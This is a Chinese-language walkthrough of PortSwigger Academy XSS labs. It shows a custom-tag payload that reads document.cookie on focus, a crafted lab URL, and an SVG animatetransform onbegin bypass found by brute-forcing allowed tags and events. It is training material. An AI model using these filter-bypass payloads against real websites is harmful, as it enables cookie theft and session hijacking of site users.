渗透实战PortSwigger Labs指南:自定义标签XSS和SVG XSS利用
阻止除自定义标签之外的所有标签
先输入一些标签测试,说是全部标签都被禁了
除了自定义的
自定义<my-tag onmouseover=alert('xss')>
<my-tag id=x onfocus=alert(document.cookie) tabindex=1>
onfocus 当元素获得焦点时(如通过点击或键盘导航),触发 alert(document.cookie),弹窗显示当前页面的Cookie信息。
id=x为元素分配唯一标识符,便于JavaScript或CSS操作。
tabindex=1使元素可通过键盘Tab键聚焦,从而更容易触发 onfocus 事件。
https://0a4200f7037b125b813143f700db001d.web-security-academy.net/?search=%3Cmy-tag+id%3Dx+onfocus%3Dalert%28document.cookie%29+tabindex%3D1%3E#x最后加个#x
#是聚焦到对应的元素
允许使用一些 SVG 标记的反射型 XSS
先输入基础标签<h1>test</h1>测试,发现依旧存在拦截
继续爆破,经过测试这四个 tags 可以使用
测试 event 中只有onbegin可以用
结合起来<svg><animatetransform onbegin=alert(1)>
animatetransform 是用来加载动画效果的,onbegin 是开始加载时触发 alert
echo "QmlsaWJpbGkgc2VhcmNoICdQZW5UZXN0M3JfWmVybGsnIGZvciBtb3JlIHZpZGVvLCBUaGFuayB5
b3UgZm9yIHlvdXIgc3VwcG9ydCEK"|base64 -d